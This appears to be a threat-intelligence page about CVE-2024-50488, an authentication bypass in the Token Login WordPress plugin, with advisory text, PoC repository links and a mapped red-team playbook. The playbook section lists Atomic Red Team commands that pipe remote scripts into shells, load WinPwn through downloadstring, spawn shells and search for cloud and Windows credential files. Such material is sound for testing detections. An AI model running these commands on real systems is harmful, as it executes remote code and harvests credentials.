CVE-2024-50488
Overview
This vulnerability is an authentication bypass in the yespbs Token Login WordPress plugin, caused by improper validation of authentication paths. The root cause lies in the plugin's token-login mechanism failing to correctly enforce authentication checks, allowing alternate request paths or channels to circumvent the intended login verification process. The affected component is the Token Login plugin versions up to and including 1.0.3.
Vulnerability Description
Authentication Bypass Using an Alternate Path or Channel vulnerability in yespbs Token Login token-login allows Authentication Bypass.This issue affects Token Login: from n/a through <= 1.0.3.
Impact
An attacker with no valid credentials can bypass authentication controls and gain unauthorized access to user accounts or administrative functions within the WordPress site using the Token Login plugin. This enables potential full account takeover, data exposure, and unauthorized actions under the context of the compromised account. The exploit requires only the ability to send crafted HTTP requests to the vulnerable plugin endpoints, without any user interaction or prior authentication. This can lead to significant data breaches and compromise of site integrity.
Solution
Upgrade the yespbs Token Login WordPress plugin to version 1.0.4 or later, where the authentication bypass vulnerability has been addressed. Refer to the Patchstack advisory at https://patchstack.com/database/Wordpress/Plugin/token-login/vulnerability/wordpress-token-login-plugin-1-0-3-broken-authentication-vulnerability?_s_id=cve for detailed patch instructions and verification steps. Applying the vendor-provided update is the recommended remediation to eliminate the authentication bypass issue.
EPSS vs KEV Prediction — Evolution (30 days)
Overview
Analysis generation failed
Threat Summary
Analysis generation failed
Full Analysis
The vulnerability in the Token Login plugin for WordPress presents a significant security risk due to an authentication bypass issue. This flaw allows attackers to gain unauthorized access to user accounts by exploiting alternate paths or channels that bypass standard authentication mechanisms. Specifically, the vulnerability exists in versions of the plugin up to and including 1.0.3, where improper validation of user credentials can be exploited. Attackers can leverage this weakness to authenticate as legitimate users without providing valid credentials, effectively undermining the security model of the application.
Exploitation of this vulnerability can occur through various attack vectors. An attacker may utilize crafted requests to manipulate the authentication process, potentially using automated scripts to target multiple accounts. For example, an attacker could send specially formatted requests that exploit the plugin's handling of authentication tokens, allowing them to bypass login requirements entirely. This could lead to unauthorized access to sensitive user data, administrative functions, or even the ability to modify site content. The ease of exploitation, combined with the potential for widespread impact, makes this vulnerability particularly concerning for WordPress sites utilizing the affected plugin.
The real-world implications of this vulnerability are profound, especially for businesses relying on the Token Login plugin for user authentication. Unauthorized access to user accounts can lead to data breaches, loss of sensitive information, and damage to an organization’s reputation. Additionally, if an attacker gains administrative access, they could manipulate site content, install malicious software, or conduct further attacks against users. The financial repercussions could be significant, including costs associated with incident response, legal liabilities, and potential regulatory fines, particularly if personal data is compromised. The high CVSS score of 8.8 indicates that this vulnerability poses a critical threat, necessitating immediate attention from affected organizations.
To detect and mitigate this vulnerability, organizations should implement several strategies. First, it is essential to update the Token Login plugin to the latest version, where the authentication bypass issue has been addressed. Regularly monitoring and applying security updates for all WordPress plugins is a best practice that can help mitigate similar vulnerabilities in the future. Additionally, organizations should conduct thorough security assessments and penetration testing to identify and remediate any potential weaknesses in their authentication mechanisms. Implementing multi-factor authentication (MFA) can also significantly enhance security by adding an additional layer of verification, making it more difficult for attackers to gain unauthorized access even if they exploit the vulnerability.
In conclusion, the authentication bypass vulnerability in the Token Login plugin for WordPress represents a critical security concern that can lead to unauthorized access and significant business risks. Organizations must prioritize the detection and mitigation of this vulnerability through timely updates, security assessments, and enhanced authentication measures. By taking proactive steps, businesses can safeguard their systems, protect user data, and maintain the integrity of their online presence.
CSURFACE threat intelligence has identified a significant development in the exploitation landscape of CVE-2024-50488. A public proof-of-concept exploit has emerged on GitHub, marking the first known instance of publicly accessible exploit code targeting the authentication bypass vulnerability in yespbs Token Login versions up to 1.0.3. This emergence corresponds with a substantial increase in the CVSS score to 8.8 and the appearance of a notable Exploit Prediction Scoring System (EPSS) value at 0.2649, placing the vulnerability in the upper percentile for exploitation likelihood. Our telemetry indicates that this availability of exploit code has expanded the attack surface, lowering the barrier for threat actors to conduct unauthorized access attempts. While exploitation activity remains stable without a rapid surge, the presence of a reliable exploit tool elevates the risk profile considerably. Defenders must now contend with a heightened threat level as adversaries can more readily leverage automated or semi-automated methods to bypass authentication controls. This shift underscores an urgent need for vigilance in monitoring and response, as the vulnerability’s exploitation potential has transitioned from theoretical to practical.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Priyabratasarkar | Token Login | All |
cpe:2.3:a:priyabratasarkar:token_login:*:*:*:*:*:wordpress:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
PoC
|
- | 0 | 0 | - | View |
|
RandomRobbieBF/CVE-2024-50488
Token Login <= 1.0.3 - Authenticated (Subscriber+) Privilege Escalation
|
RandomRobbieBF | 0 | 0 | 2024-11-09 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-50488 |
| patchstack.com |
GitHub CVE
vdb-entry
|
https://patchstack.com/database/Wordpress/Plugin/token-login/vulnerability/wordpress-token-login-plugin-1-0-3-broken-authentication-vulnerability?_s_id=cve |